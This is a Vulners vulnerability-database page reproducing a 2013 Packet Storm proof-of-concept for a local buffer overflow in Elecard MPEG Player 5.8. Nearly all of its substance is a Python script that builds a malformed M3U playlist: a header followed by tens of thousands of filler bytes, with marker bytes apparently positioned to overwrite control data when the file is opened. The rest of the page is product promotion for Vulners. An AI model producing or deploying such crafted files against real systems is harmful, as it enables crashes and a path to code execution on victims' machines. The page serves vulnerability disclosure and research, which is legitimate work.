Lucene search
K

Elecard MPEG Player 5.8 Buffer Overflow

🗓️ 27 Apr 2013 00:00:00Reported by metacomType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

Elecard MPEG Player 5.8 Buffer Overflow PoC for Windows

Code
`#!/usr/bin/python   
# Exploit Title:Elecard MPEG Player 5.8 Local PoC   
# Download link :www.elecard.com/assets/files/distribs/mpeg-player/EMpgPlayer.zip  
# Product: Vulnerable  
# Elecard MPEG Player,Elecard AVC HD Player  
# RST  
# Date (found): 27.04.2013  
# Date (publish): 27.04.2013  
# Author: metacom  
# version:5.8.121004  
# Category: poc  
# Tested on: windows 7 German   
  
head="#EXTM3U\n"  
head+="#EXTINF:153,Artist - song\n"  
filename= "elecard.m3u"  
  
buffer= "\x41" * 783  
buffer+="\x42" * 4   
buffer+="\x43" * 4  
buffer+="\x44" * 25000  
  
textfile = open(filename , 'w')  
textfile.write(head+buffer)  
textfile.close()  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Apr 2013 00:00Current
0.6Low risk
Vulners AI Score0.6
28